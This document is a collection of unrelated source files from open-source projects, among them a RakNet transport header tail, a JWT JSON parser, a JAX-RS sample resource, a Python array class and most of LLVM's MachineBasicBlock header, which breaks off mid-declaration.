/// If a system loses the connection, you should queue that event and return the systemAddress/address of that player in this function.
/// \return The SystemAddress/address of the system
SystemAddress HasLostConnection(void);
virtual CommandParserInterface* GetCommandParser(void) {return 0;}
/// \internal
virtual PluginReceiveResult OnReceive(Packet *packet);
/// \internal
virtual void OnClosedConnection(const SystemAddress &systemAddress, RakNetGUID rakNetGUID, PI2_LostConnectionReason lostConnectionReason );
/// \internal
virtual void OnNewConnection(const SystemAddress &systemAddress, RakNetGUID rakNetGUID, bool isIncoming);
protected:
DataStructures::Queue<SystemAddress> newConnections, lostConnections;
DataStructures::Queue<Packet*> packetQueue;
};
} // namespace SLNet
#endif
#endif // _RAKNET_SUPPORT_*
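// A minimal usage sketch, assuming a ConsoleServer is wired up elsewhere; the
// port number and systemAddress below are illustrative placeholders, not part
// of this header.
//
//   SLNet::RakNetTransport2 transport;
//   transport.Start(23, true);                           // listen for console clients
//   transport.Send(systemAddress, "hello %s\n", "world");
//   SLNet::Packet *packet = transport.Receive();
//   if (packet) transport.DeallocatePacket(packet);
//   transport.Stop();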
| 1,448 |
686 | <filename>config/coins/elephantcoin.json
{
"name": "Elephantcoin",
"symbol": "ELP",
"algorithm": "scrypt",
"site": "http://elephantcoin.wordpress.com/",
"blockExplorer": {
"block": "http://www.exploretheblocks.com/elephantcoin/block_crawler.php?block_hash=",
"tx": "http://www.exploretheblocks.com/elephantcoin/block_crawler.php?transaction="
}
} | 162 |
4,950 | package com.auth0.jwt.impl;
import com.auth0.jwt.exceptions.JWTDecodeException;
import com.auth0.jwt.interfaces.Header;
import com.auth0.jwt.interfaces.JWTPartsParser;
import com.auth0.jwt.interfaces.Payload;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.ObjectReader;
import com.fasterxml.jackson.databind.SerializationFeature;
import com.fasterxml.jackson.databind.module.SimpleModule;
import java.io.IOException;
public class JWTParser implements JWTPartsParser {
private final ObjectReader payloadReader;
private final ObjectReader headerReader;
public JWTParser() {
this(getDefaultObjectMapper());
}
JWTParser(ObjectMapper mapper) {
addDeserializers(mapper);
this.payloadReader = mapper.readerFor(Payload.class);
this.headerReader = mapper.readerFor(Header.class);
}
@Override
public Payload parsePayload(String json) throws JWTDecodeException {
if (json == null) {
throw decodeException();
}
try {
return payloadReader.readValue(json);
} catch (IOException e) {
throw decodeException(json);
}
}
@Override
public Header parseHeader(String json) throws JWTDecodeException {
if (json == null) {
throw decodeException();
}
try {
return headerReader.readValue(json);
} catch (IOException e) {
throw decodeException(json);
}
}
private void addDeserializers(ObjectMapper mapper) {
SimpleModule module = new SimpleModule();
ObjectReader reader = mapper.reader();
module.addDeserializer(Payload.class, new PayloadDeserializer(reader));
module.addDeserializer(Header.class, new HeaderDeserializer(reader));
mapper.registerModule(module);
}
static ObjectMapper getDefaultObjectMapper() {
ObjectMapper mapper = new ObjectMapper();
mapper.disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
mapper.setSerializationInclusion(JsonInclude.Include.NON_EMPTY);
return mapper;
}
private static JWTDecodeException decodeException() {
return decodeException(null);
}
private static JWTDecodeException decodeException(String json) {
return new JWTDecodeException(String.format("The string '%s' doesn't have a valid JSON format.", json));
}
}
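// A brief usage sketch; headerJson and payloadJson are placeholders for the
// already Base64url-decoded JSON segments of a token.
//
//   JWTPartsParser parser = new JWTParser();
//   Header header = parser.parseHeader(headerJson);     // e.g. {"alg":"HS256","typ":"JWT"}
//   Payload payload = parser.parsePayload(payloadJson); // throws JWTDecodeException on malformed JSON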
| 964 |
505 | <filename>application-server-cheatsheet/src/main/java/sample/SampleResource.java
package sample;
import java.sql.Connection;
import java.sql.SQLException;
import javax.annotation.Resource;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import javax.sql.DataSource;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.core.Response;
@Path("sample")
public class SampleResource {
private String message = "Hello World!";
@PersistenceContext
private EntityManager em;
@Resource(lookup = "jdbc/postgres")
// @Resource(name = "jdbc/postgres") for Tomee
// @Resource(lookup = "java:jboss/datasources/postgres") for WildFly
private DataSource dataSource;
@GET
public Response message() throws SQLException {
String databaseName = "";
try (Connection con = dataSource.getConnection()) {
databaseName = con.getMetaData().getDatabaseProductName();
}
return Response.ok(message + " with database: " + databaseName).build();
}
}
| 371 |
8,805 | <filename>osx/KBKit/KBKit/UI/Folders/KBUserPermission.h
//
// KBUserPermission.h
// Keybase
//
// Created by Gabriel on 4/30/15.
// Copyright (c) 2015 <NAME>. All rights reserved.
//
#import <Foundation/Foundation.h>
#import "KBRPC.h"
@interface KBUserPermission : NSObject
@property KBRUser *user;
@property NSString *permission;
@end
| 131 |
432 | package us.parr.bookish.model.ref;
import us.parr.bookish.entity.EntityDef;
public class CitationRef extends EntityRef {
public CitationRef(EntityDef def) {
super(def);
}
}
| 63 |
746 | package org.protege.editor.core.util;
/**
* <NAME>
* Stanford Center for Biomedical Informatics Research
* 2 Jun 16
*/
public class StringAbbreviator {
public static final String ELLIPSIS = "\u2026";
/**
* Abbreviates the specified string to the specified length
* @param s The String to be abbreviated. Not {@code null}.
* @param length The maximum length. The original string will be truncated to this length.
     * @return The abbreviated string, whose length is less than or equal to the specified length. If the specified
     * length is less than the original string length then a trailing ellipsis will be added.
*/
public static String abbreviateString(String s, int length) {
if(s == null) {
return null;
}
if(s.isEmpty()) {
return s;
}
if(length <= 0) {
return ELLIPSIS;
}
// Finish at either the length or the specified length
int endIndex = Math.min(s.length(), length);
String truncatedString = s.substring(0, endIndex);
if(truncatedString.length() < s.length()) {
return truncatedString + ELLIPSIS;
}
else {
return truncatedString;
}
}
}
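// A short usage sketch (values are illustrative):
//
//   StringAbbreviator.abbreviateString("Protege Editor", 7); // -> "Protege…"
//   StringAbbreviator.abbreviateString("OWL", 10);           // -> "OWL" (short enough already)
//   StringAbbreviator.abbreviateString(null, 5);             // -> null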
| 495 |
1,489 | package me.ele.amigo.compat;
import java.lang.reflect.InvocationTargetException;
import me.ele.amigo.reflect.MethodUtils;
public class ActivityManagerNativeCompat {
private static Class sClass;
public static Class Class() throws ClassNotFoundException {
if (sClass == null) {
sClass = Class.forName("android.app.ActivityManagerNative");
}
return sClass;
}
public static Object getDefault() throws ClassNotFoundException, NoSuchMethodException,
IllegalAccessException, InvocationTargetException {
return MethodUtils.invokeStaticMethod(Class(), "getDefault");
}
}
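// A hedged usage sketch: getDefault() reflectively resolves
// android.app.ActivityManagerNative.getDefault(); the variable name below is
// illustrative.
//
//   Object activityManagerProxy = ActivityManagerNativeCompat.getDefault();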
| 218 |
1,119 | package com.macro.mall.tiny.security.annotation;
import java.lang.annotation.*;
/**
 * Custom annotation; cache methods carrying this annotation will throw exceptions.
*/
@Documented
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
public @interface CacheException {
}
| 114 |
2,468 | # -*- coding: utf-8 -*-
# https://docs.python.org/2/library/array.html
from array import array  # the fairly primitive array class provided by Python
arr = array('u', 'asdf')
print(arr[0], arr[1], arr[2], arr[3])
# A fixed-length Array ADT; bounds checking and similar details are omitted
class Array(object):
def __init__(self, size=32):
self._size = size
self._items = [None] * size
def __getitem__(self, index):
return self._items[index]
def __setitem__(self, index, value):
self._items[index] = value
def __len__(self):
return self._size
def clear(self, value=None):
for i in range(len(self._items)):
self._items[i] = value
def __iter__(self):
for item in self._items:
yield item
def test_array():
size = 10
a = Array(size)
a[0] = 1
assert a[0] == 1
assert len(a) == 10
# py.test array_and_list.py
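# A small additional usage sketch (illustrative, separate from the test above):
# a = Array(3)
# a.clear(0)       # fill every slot with 0
# print(list(a))   # [0, 0, 0], produced via __iter__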
| 434 |
1,861 | // Copyright (c) Facebook, Inc. and its affiliates.
//
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
#define FSPObjectEqualObject(lhs, rhs) (lhs == rhs || (lhs != nil && [lhs isEqual:rhs]))
#include <folly/FixedString.h>
NS_INLINE NSString *FSPStringFromInternalFixedString(const folly::FixedString<10> &fixedString)
{
return [NSString stringWithUTF8String:fixedString.cbegin()];
}
NS_INLINE folly::FixedString<10> FSPInternalFixedStringFromString(NSString *const string)
{
return folly::FixedString<10>{string.UTF8String, string.length};
}
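// A small illustrative round trip (the literal is arbitrary):
//
//   folly::FixedString<10> fixed = FSPInternalFixedStringFromString(@"hello");
//   NSString *roundTripped = FSPStringFromInternalFixedString(fixed); // @"hello"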
| 202 |
938 | //===- llvm/CodeGen/MachineBasicBlock.h -------------------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// Collect the sequence of machine instructions for a basic block.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CODEGEN_MACHINEBASICBLOCK_H
#define LLVM_CODEGEN_MACHINEBASICBLOCK_H
#include "llvm/ADT/GraphTraits.h"
#include "llvm/ADT/ilist.h"
#include "llvm/ADT/ilist_node.h"
#include "llvm/ADT/iterator_range.h"
#include "llvm/ADT/simple_ilist.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBundleIterator.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/MC/LaneBitmask.h"
#include "llvm/MC/MCRegisterInfo.h"
#include "llvm/Support/BranchProbability.h"
#include "llvm/Support/Printable.h"
#include <cassert>
#include <cstdint>
#include <functional>
#include <iterator>
#include <string>
#include <vector>
namespace llvm {
class BasicBlock;
class MachineFunction;
class MCSymbol;
class ModuleSlotTracker;
class Pass;
class SlotIndexes;
class StringRef;
class raw_ostream;
class TargetRegisterClass;
class TargetRegisterInfo;
template <> struct ilist_traits<MachineInstr> {
private:
friend class MachineBasicBlock; // Set by the owning MachineBasicBlock.
MachineBasicBlock *Parent;
using instr_iterator =
simple_ilist<MachineInstr, ilist_sentinel_tracking<true>>::iterator;
public:
void addNodeToList(MachineInstr *N);
void removeNodeFromList(MachineInstr *N);
void transferNodesFromList(ilist_traits &FromList, instr_iterator First,
instr_iterator Last);
void deleteNode(MachineInstr *MI);
};
class MachineBasicBlock
: public ilist_node_with_parent<MachineBasicBlock, MachineFunction> {
public:
/// Pair of physical register and lane mask.
/// This is not simply a std::pair typedef because the members should be named
/// clearly as they both have an integer type.
struct RegisterMaskPair {
public:
MCPhysReg PhysReg;
LaneBitmask LaneMask;
RegisterMaskPair(MCPhysReg PhysReg, LaneBitmask LaneMask)
: PhysReg(PhysReg), LaneMask(LaneMask) {}
};
private:
using Instructions = ilist<MachineInstr, ilist_sentinel_tracking<true>>;
Instructions Insts;
const BasicBlock *BB;
int Number;
MachineFunction *xParent;
/// Keep track of the predecessor / successor basic blocks.
std::vector<MachineBasicBlock *> Predecessors;
std::vector<MachineBasicBlock *> Successors;
/// Keep track of the probabilities to the successors. This vector has the
/// same order as Successors, or it is empty if we don't use it (disable
/// optimization).
std::vector<BranchProbability> Probs;
using probability_iterator = std::vector<BranchProbability>::iterator;
using const_probability_iterator =
std::vector<BranchProbability>::const_iterator;
Optional<uint64_t> IrrLoopHeaderWeight;
/// Keep track of the physical registers that are livein of the basicblock.
using LiveInVector = std::vector<RegisterMaskPair>;
LiveInVector LiveIns;
/// Alignment of the basic block. Zero if the basic block does not need to be
/// aligned. The alignment is specified as log2(bytes).
unsigned Alignment = 0;
/// Indicate that this basic block is entered via an exception handler.
bool IsEHPad = false;
/// Indicate that this basic block is potentially the target of an indirect
/// branch.
bool AddressTaken = false;
/// Indicate that this basic block needs its symbol be emitted regardless of
/// whether the flow just falls-through to it.
bool LabelMustBeEmitted = false;
/// Indicate that this basic block is the entry block of an EH scope, i.e.,
/// the block that used to have a catchpad or cleanuppad instruction in the
/// LLVM IR.
bool IsEHScopeEntry = false;
/// Indicate that this basic block is the entry block of an EH funclet.
bool IsEHFuncletEntry = false;
/// Indicate that this basic block is the entry block of a cleanup funclet.
bool IsCleanupFuncletEntry = false;
/// since getSymbol is a relatively heavy-weight operation, the symbol
/// is only computed once and is cached.
mutable MCSymbol *CachedMCSymbol = nullptr;
// Intrusive list support
MachineBasicBlock() = default;
explicit MachineBasicBlock(MachineFunction &MF, const BasicBlock *BB);
~MachineBasicBlock();
// MachineBasicBlocks are allocated and owned by MachineFunction.
friend class MachineFunction;
public:
/// Return the LLVM basic block that this instance corresponded to originally.
/// Note that this may be NULL if this instance does not correspond directly
/// to an LLVM basic block.
const BasicBlock *getBasicBlock() const { return BB; }
/// Return the name of the corresponding LLVM basic block, or an empty string.
StringRef getName() const;
/// Return a formatted string to identify this block and its parent function.
std::string getFullName() const;
/// Test whether this block is potentially the target of an indirect branch.
bool hasAddressTaken() const { return AddressTaken; }
/// Set this block to reflect that it potentially is the target of an indirect
/// branch.
void setHasAddressTaken() { AddressTaken = true; }
/// Test whether this block must have its label emitted.
bool hasLabelMustBeEmitted() const { return LabelMustBeEmitted; }
/// Set this block to reflect that, regardless how we flow to it, we need
/// its label be emitted.
void setLabelMustBeEmitted() { LabelMustBeEmitted = true; }
/// Return the MachineFunction containing this basic block.
const MachineFunction *getParent() const { return xParent; }
MachineFunction *getParent() { return xParent; }
using instr_iterator = Instructions::iterator;
using const_instr_iterator = Instructions::const_iterator;
using reverse_instr_iterator = Instructions::reverse_iterator;
using const_reverse_instr_iterator = Instructions::const_reverse_iterator;
using iterator = MachineInstrBundleIterator<MachineInstr>;
using const_iterator = MachineInstrBundleIterator<const MachineInstr>;
using reverse_iterator = MachineInstrBundleIterator<MachineInstr, true>;
using const_reverse_iterator =
MachineInstrBundleIterator<const MachineInstr, true>;
unsigned size() const { return (unsigned)Insts.size(); }
bool empty() const { return Insts.empty(); }
MachineInstr &instr_front() { return Insts.front(); }
MachineInstr &instr_back() { return Insts.back(); }
const MachineInstr &instr_front() const { return Insts.front(); }
const MachineInstr &instr_back() const { return Insts.back(); }
MachineInstr &front() { return Insts.front(); }
MachineInstr &back() { return *--end(); }
const MachineInstr &front() const { return Insts.front(); }
const MachineInstr &back() const { return *--end(); }
instr_iterator instr_begin() { return Insts.begin(); }
const_instr_iterator instr_begin() const { return Insts.begin(); }
instr_iterator instr_end() { return Insts.end(); }
const_instr_iterator instr_end() const { return Insts.end(); }
reverse_instr_iterator instr_rbegin() { return Insts.rbegin(); }
const_reverse_instr_iterator instr_rbegin() const { return Insts.rbegin(); }
reverse_instr_iterator instr_rend () { return Insts.rend(); }
const_reverse_instr_iterator instr_rend () const { return Insts.rend(); }
using instr_range = iterator_range<instr_iterator>;
using const_instr_range = iterator_range<const_instr_iterator>;
instr_range instrs() { return instr_range(instr_begin(), instr_end()); }
const_instr_range instrs() const {
return const_instr_range(instr_begin(), instr_end());
}
iterator begin() { return instr_begin(); }
const_iterator begin() const { return instr_begin(); }
iterator end () { return instr_end(); }
const_iterator end () const { return instr_end(); }
reverse_iterator rbegin() {
return reverse_iterator::getAtBundleBegin(instr_rbegin());
}
const_reverse_iterator rbegin() const {
return const_reverse_iterator::getAtBundleBegin(instr_rbegin());
}
reverse_iterator rend() { return reverse_iterator(instr_rend()); }
const_reverse_iterator rend() const {
return const_reverse_iterator(instr_rend());
}
/// Support for MachineInstr::getNextNode().
static Instructions MachineBasicBlock::*getSublistAccess(MachineInstr *) {
return &MachineBasicBlock::Insts;
}
inline iterator_range<iterator> terminators() {
return make_range(getFirstTerminator(), end());
}
inline iterator_range<const_iterator> terminators() const {
return make_range(getFirstTerminator(), end());
}
/// Returns a range that iterates over the phis in the basic block.
inline iterator_range<iterator> phis() {
return make_range(begin(), getFirstNonPHI());
}
inline iterator_range<const_iterator> phis() const {
return const_cast<MachineBasicBlock *>(this)->phis();
}
// Machine-CFG iterators
using pred_iterator = std::vector<MachineBasicBlock *>::iterator;
using const_pred_iterator = std::vector<MachineBasicBlock *>::const_iterator;
using succ_iterator = std::vector<MachineBasicBlock *>::iterator;
using const_succ_iterator = std::vector<MachineBasicBlock *>::const_iterator;
using pred_reverse_iterator =
std::vector<MachineBasicBlock *>::reverse_iterator;
using const_pred_reverse_iterator =
std::vector<MachineBasicBlock *>::const_reverse_iterator;
using succ_reverse_iterator =
std::vector<MachineBasicBlock *>::reverse_iterator;
using const_succ_reverse_iterator =
std::vector<MachineBasicBlock *>::const_reverse_iterator;
pred_iterator pred_begin() { return Predecessors.begin(); }
const_pred_iterator pred_begin() const { return Predecessors.begin(); }
pred_iterator pred_end() { return Predecessors.end(); }
const_pred_iterator pred_end() const { return Predecessors.end(); }
pred_reverse_iterator pred_rbegin()
{ return Predecessors.rbegin();}
const_pred_reverse_iterator pred_rbegin() const
{ return Predecessors.rbegin();}
pred_reverse_iterator pred_rend()
{ return Predecessors.rend(); }
const_pred_reverse_iterator pred_rend() const
{ return Predecessors.rend(); }
unsigned pred_size() const {
return (unsigned)Predecessors.size();
}
bool pred_empty() const { return Predecessors.empty(); }
succ_iterator succ_begin() { return Successors.begin(); }
const_succ_iterator succ_begin() const { return Successors.begin(); }
succ_iterator succ_end() { return Successors.end(); }
const_succ_iterator succ_end() const { return Successors.end(); }
succ_reverse_iterator succ_rbegin()
{ return Successors.rbegin(); }
const_succ_reverse_iterator succ_rbegin() const
{ return Successors.rbegin(); }
succ_reverse_iterator succ_rend()
{ return Successors.rend(); }
const_succ_reverse_iterator succ_rend() const
{ return Successors.rend(); }
unsigned succ_size() const {
return (unsigned)Successors.size();
}
bool succ_empty() const { return Successors.empty(); }
inline iterator_range<pred_iterator> predecessors() {
return make_range(pred_begin(), pred_end());
}
inline iterator_range<const_pred_iterator> predecessors() const {
return make_range(pred_begin(), pred_end());
}
inline iterator_range<succ_iterator> successors() {
return make_range(succ_begin(), succ_end());
}
inline iterator_range<const_succ_iterator> successors() const {
return make_range(succ_begin(), succ_end());
}
// LiveIn management methods.
/// Adds the specified register as a live in. Note that it is an error to add
/// the same register to the same set more than once unless the intention is
/// to call sortUniqueLiveIns after all registers are added.
void addLiveIn(MCPhysReg PhysReg,
LaneBitmask LaneMask = LaneBitmask::getAll()) {
LiveIns.push_back(RegisterMaskPair(PhysReg, LaneMask));
}
void addLiveIn(const RegisterMaskPair &RegMaskPair) {
LiveIns.push_back(RegMaskPair);
}
/// Sorts and uniques the LiveIns vector. It can be significantly faster to do
/// this than repeatedly calling isLiveIn before calling addLiveIn for every
/// LiveIn insertion.
void sortUniqueLiveIns();
/// Clear live in list.
void clearLiveIns();
/// Add PhysReg as live in to this block, and ensure that there is a copy of
/// PhysReg to a virtual register of class RC. Return the virtual register
/// that is a copy of the live in PhysReg.
unsigned addLiveIn(MCPhysReg PhysReg, const TargetRegisterClass *RC);
/// Remove the specified register from the live in set.
void removeLiveIn(MCPhysReg Reg,
LaneBitmask LaneMask = LaneBitmask::getAll());
/// Return true if the specified register is in the live in set.
bool isLiveIn(MCPhysReg Reg,
LaneBitmask LaneMask = LaneBitmask::getAll()) const;
// Iteration support for live in sets. These sets are kept in sorted
// order by their register number.
using livein_iterator = LiveInVector::const_iterator;
#ifndef NDEBUG
/// Unlike livein_begin, this method does not check that the liveness
/// information is accurate. Still for debug purposes it may be useful
/// to have iterators that won't assert if the liveness information
/// is not current.
livein_iterator livein_begin_dbg() const { return LiveIns.begin(); }
iterator_range<livein_iterator> liveins_dbg() const {
return make_range(livein_begin_dbg(), livein_end());
}
#endif
livein_iterator livein_begin() const;
livein_iterator livein_end() const { return LiveIns.end(); }
bool livein_empty() const { return LiveIns.empty(); }
iterator_range<livein_iterator> liveins() const {
return make_range(livein_begin(), livein_end());
}
/// Remove entry from the livein set and return iterator to the next.
livein_iterator removeLiveIn(livein_iterator I);
/// Get the clobber mask for the start of this basic block. Funclets use this
/// to prevent register allocation across funclet transitions.
const uint32_t *getBeginClobberMask(const TargetRegisterInfo *TRI) const;
/// Get the clobber mask for the end of the basic block.
/// \see getBeginClobberMask()
const uint32_t *getEndClobberMask(const TargetRegisterInfo *TRI) const;
/// Return alignment of the basic block. The alignment is specified as
/// log2(bytes).
unsigned getAlignment() const { return Alignment; }
/// Set alignment of the basic block. The alignment is specified as
/// log2(bytes).
void setAlignment(unsigned Align) { Alignment = Align; }
/// Returns true if the block is a landing pad. That is this basic block is
/// entered via an exception handler.
bool isEHPad() const { return IsEHPad; }
/// Indicates the block is a landing pad. That is this basic block is entered
/// via an exception handler.
void setIsEHPad(bool V = true) { IsEHPad = V; }
bool hasEHPadSuccessor() const;
/// Returns true if this is the entry block of an EH scope, i.e., the block
/// that used to have a catchpad or cleanuppad instruction in the LLVM IR.
bool isEHScopeEntry() const { return IsEHScopeEntry; }
/// Indicates if this is the entry block of an EH scope, i.e., the block that
  /// used to have a catchpad or cleanuppad instruction in the LLVM IR.
void setIsEHScopeEntry(bool V = true) { IsEHScopeEntry = V; }
/// Returns true if this is the entry block of an EH funclet.
bool isEHFuncletEntry() const { return IsEHFuncletEntry; }
/// Indicates if this is the entry block of an EH funclet.
void setIsEHFuncletEntry(bool V = true) { IsEHFuncletEntry = V; }
/// Returns true if this is the entry block of a cleanup funclet.
bool isCleanupFuncletEntry() const { return IsCleanupFuncletEntry; }
/// Indicates if this is the entry block of a cleanup funclet.
void setIsCleanupFuncletEntry(bool V = true) { IsCleanupFuncletEntry = V; }
/// Returns true if it is legal to hoist instructions into this block.
bool isLegalToHoistInto() const;
// Code Layout methods.
/// Move 'this' block before or after the specified block. This only moves
/// the block, it does not modify the CFG or adjust potential fall-throughs at
/// the end of the block.
void moveBefore(MachineBasicBlock *NewAfter);
void moveAfter(MachineBasicBlock *NewBefore);
/// Update the terminator instructions in block to account for changes to the
/// layout. If the block previously used a fallthrough, it may now need a
/// branch, and if it previously used branching it may now be able to use a
/// fallthrough.
void updateTerminator();
// Machine-CFG mutators
/// Add Succ as a successor of this MachineBasicBlock. The Predecessors list
/// of Succ is automatically updated. PROB parameter is stored in
/// Probabilities list. The default probability is set as unknown. Mixing
/// known and unknown probabilities in successor list is not allowed. When all
/// successors have unknown probabilities, 1 / N is returned as the
/// probability for each successor, where N is the number of successors.
///
/// Note that duplicate Machine CFG edges are not allowed.
void addSuccessor(MachineBasicBlock *Succ,
BranchProbability Prob = BranchProbability::getUnknown());
/// Add Succ as a successor of this MachineBasicBlock. The Predecessors list
/// of Succ is automatically updated. The probability is not provided because
/// BPI is not available (e.g. -O0 is used), in which case edge probabilities
/// won't be used. Using this interface can save some space.
void addSuccessorWithoutProb(MachineBasicBlock *Succ);
/// Set successor probability of a given iterator.
void setSuccProbability(succ_iterator I, BranchProbability Prob);
/// Normalize probabilities of all successors so that the sum of them becomes
/// one. This is usually done when the current update on this MBB is done, and
/// the sum of its successors' probabilities is not guaranteed to be one. The
/// user is responsible for the correct use of this function.
/// MBB::removeSuccessor() has an option to do this automatically.
void normalizeSuccProbs() {
BranchProbability::normalizeProbabilities(Probs.begin(), Probs.end());
}
/// Validate successors' probabilities and check if the sum of them is
/// approximate one. This only works in DEBUG mode.
void validateSuccProbs() const;
/// Remove successor from the successors list of this MachineBasicBlock. The
/// Predecessors list of Succ is automatically updated.
/// If NormalizeSuccProbs is true, then normalize successors' probabilities
/// after the successor is removed.
void removeSuccessor(MachineBasicBlock *Succ,
bool NormalizeSuccProbs = false);
/// Remove specified successor from the successors list of this
/// MachineBasicBlock. The Predecessors list of Succ is automatically updated.
/// If NormalizeSuccProbs is true, then normalize successors' probabilities
/// after the successor is removed.
/// Return the iterator to the element after the one removed.
succ_iterator removeSuccessor(succ_iterator I,
bool NormalizeSuccProbs = false);
/// Replace successor OLD with NEW and update probability info.
void replaceSuccessor(MachineBasicBlock *Old, MachineBasicBlock *New);
  /// Copy a successor (and any probability info) from the original block to this
  /// block's successor list. Uses an iterator into the original block's successors.
///
/// This is useful when doing a partial clone of successors. Afterward, the
/// probabilities may need to be normalized.
void copySuccessor(MachineBasicBlock *Orig, succ_iterator I);
/// Split the old successor into old plus new and updates the probability
/// info.
void splitSuccessor(MachineBasicBlock *Old, MachineBasicBlock *New,
bool NormalizeSuccProbs = false);
/// Transfers all the successors from MBB to this machine basic block (i.e.,
/// copies all the successors FromMBB and remove all the successors from
/// FromMBB).
void transferSuccessors(MachineBasicBlock *FromMBB);
/// Transfers all the successors, as in transferSuccessors, and update PHI
/// operands in the successor blocks which refer to FromMBB to refer to this.
void transferSuccessorsAndUpdatePHIs(MachineBasicBlock *FromMBB);
/// Return true if any of the successors have probabilities attached to them.
bool hasSuccessorProbabilities() const { return !Probs.empty(); }
/// Return true if the specified MBB is a predecessor of this block.
bool isPredecessor(const MachineBasicBlock *MBB) const;
/// Return true if the specified MBB is a successor of this block.
bool isSuccessor(const MachineBasicBlock *MBB) const;
/// Return true if the specified MBB will be emitted immediately after this
/// block, such that if this block exits by falling through, control will
/// transfer to the specified MBB. Note that MBB need not be a successor at
/// all, for example if this block ends with an unconditional branch to some
/// other block.
bool isLayoutSuccessor(const MachineBasicBlock *MBB) const;
/// Return the fallthrough block if the block can implicitly
/// transfer control to the block after it by falling off the end of
/// it. This should return null if it can reach the block after
/// it, but it uses an explicit branch to do so (e.g., a table
/// jump). Non-null return is a conservative answer.
MachineBasicBlock *getFallThrough();
/// Return true if the block can implicitly transfer control to the
/// block after it by falling off the end of it. This should return
/// false if it can reach the block after it, but it uses an
/// explicit branch to do so (e.g., a table jump). True is a
/// conservative answer.
bool canFallThrough();
/// Returns a pointer to the first instruction in this block that is not a
/// PHINode instruction. When adding instructions to the beginning of the
/// basic block, they should be added before the returned value, not before
/// the first instruction, which might be PHI.
  /// Returns end() if there's no non-PHI instruction.
iterator getFirstNonPHI();
/// Return the first instruction in MBB after I that is not a PHI or a label.
/// This is the correct point to insert lowered copies at the beginning of a
/// basic block that must be before any debugging information.
iterator SkipPHIsAndLabels(iterator I);
/// Return the first instruction in MBB after I that is not a PHI, label or
/// debug. This is the correct point to insert copies at the beginning of a
/// basic block.
iterator SkipPHIsLabelsAndDebug(iterator I);
/// Returns an iterator to the first terminator instruction of this basic
/// block. If a terminator does not exist, it returns end().
iterator getFirstTerminator();
const_iterator getFirstTerminator() const {
return const_cast<MachineBasicBlock *>(this)->getFirstTerminator();
}
/// Same getFirstTerminator but it ignores bundles and return an
/// instr_iterator instead.
instr_iterator getFirstInstrTerminator();
/// Returns an iterator to the first non-debug instruction in the basic block,
/// or end().
iterator getFirstNonDebugInstr();
const_iterator getFirstNonDebugInstr() const {
return const_cast<MachineBasicBlock *>(this)->getFirstNonDebugInstr();
}
/// Returns an iterator to the last non-debug instruction in the basic block,
/// or end().
iterator getLastNonDebugInstr();
const_iterator getLastNonDebugInstr() const {
return const_cast<MachineBasicBlock *>(this)->getLastNonDebugInstr();
}
/// Convenience function that returns true if the block ends in a return
/// instruction.
bool isReturnBlock() const {
return !empty() && back().isReturn();
}
  /// Convenience function that returns true if the block ends in an EH scope
/// return instruction.
bool isEHScopeReturnBlock() const {
return !empty() && back().isEHScopeReturn();
}
/// Split the critical edge from this block to the given successor block, and
/// return the newly created block, or null if splitting is not possible.
///
/// This function updates LiveVariables, MachineDominatorTree, and
/// MachineLoopInfo, as applicable.
MachineBasicBlock *SplitCriticalEdge(MachineBasicBlock *Succ, Pass &P);
/// Check if the edge between this block and the given successor \p
/// Succ, can be split. If this returns true a subsequent call to
/// SplitCriticalEdge is guaranteed to return a valid basic block if
/// no changes occurred in the meantime.
bool canSplitCriticalEdge(const MachineBasicBlock *Succ) const;
void pop_front() { Insts.pop_front(); }
void pop_back() { Insts.pop_back(); }
void push_back(MachineInstr *MI) { Insts.push_back(MI); }
/// Insert MI into the instruction list before I, possibly inside a bundle.
///
/// If the insertion point is inside a bundle, MI will be added to the bundle,
/// otherwise MI will not be added to any bundle. That means this function
/// alone can't be used to prepend or append instructions to bundles. See
/// MIBundleBuilder::insert() for a more reliable way of doing that.
instr_iterator insert(instr_iterator I, MachineInstr *M);
/// Insert a range of instructions into the instruction list before I.
template<typename IT>
void insert(iterator I, IT S, IT E) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
Insts.insert(I.getInstrIterator(), S, E);
}
/// Insert MI into the instruction list before I.
iterator insert(iterator I, MachineInstr *MI) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
assert(!MI->isBundledWithPred() && !MI->isBundledWithSucc() &&
"Cannot insert instruction with bundle flags");
return Insts.insert(I.getInstrIterator(), MI);
}
/// Insert MI into the instruction list after I.
iterator insertAfter(iterator I, MachineInstr *MI) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
assert(!MI->isBundledWithPred() && !MI->isBundledWithSucc() &&
"Cannot insert instruction with bundle flags");
return Insts.insertAfter(I.getInstrIterator(), MI);
}
/// Remove an instruction from the instruction list and delete it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
instr_iterator erase(instr_iterator I);
/// Remove an instruction from the instruction list and delete it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
instr_iterator erase_instr(MachineInstr *I) {
return erase(instr_iterator(I));
}
/// Remove a range of instructions from the instruction list and delete them.
iterator erase(iterator I, iterator E) {
return Insts.erase(I.getInstrIterator(), E.getInstrIterator());
}
/// Remove an instruction or bundle from the instruction list and delete it.
///
/// If I points to a bundle of instructions, they are all erased.
iterator erase(iterator I) {
return erase(I, std::next(I));
}
/// Remove an instruction from the instruction list and delete it.
///
/// If I is the head of a bundle of instructions, the whole bundle will be
/// erased.
iterator erase(MachineInstr *I) {
return erase(iterator(I));
}
/// Remove the unbundled instruction from the instruction list without
/// deleting it.
///
/// This function can not be used to remove bundled instructions, use
/// remove_instr to remove individual instructions from a bundle.
MachineInstr *remove(MachineInstr *I) {
